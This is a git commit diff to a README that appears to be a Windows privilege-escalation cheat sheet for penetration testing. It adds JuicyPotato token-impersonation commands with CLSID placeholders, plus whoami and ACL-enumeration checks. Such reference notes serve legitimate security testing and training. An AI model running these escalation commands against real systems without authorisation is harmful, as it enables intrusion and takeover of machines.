Update README.md

This commit is contained in:
Joe Totes
2022-10-20 14:27:05 -04:00
committed by GitHub
parent 35e3d772a5
commit 986b8ca527

View File

@@ -1029,11 +1029,15 @@ net user {USERNAME}
# Check UAC level
whoami /groups
# Check Privledges for Impersonation
# Check Privileges for Impersonation
whoami /priv
JuicyPotato.exe -t * -p {run.exe} -l 8003
JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID}
# Check File Permissions
Get-ACL {FILE or DIR} | fl
icacls {FILE}
# Powershell
cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"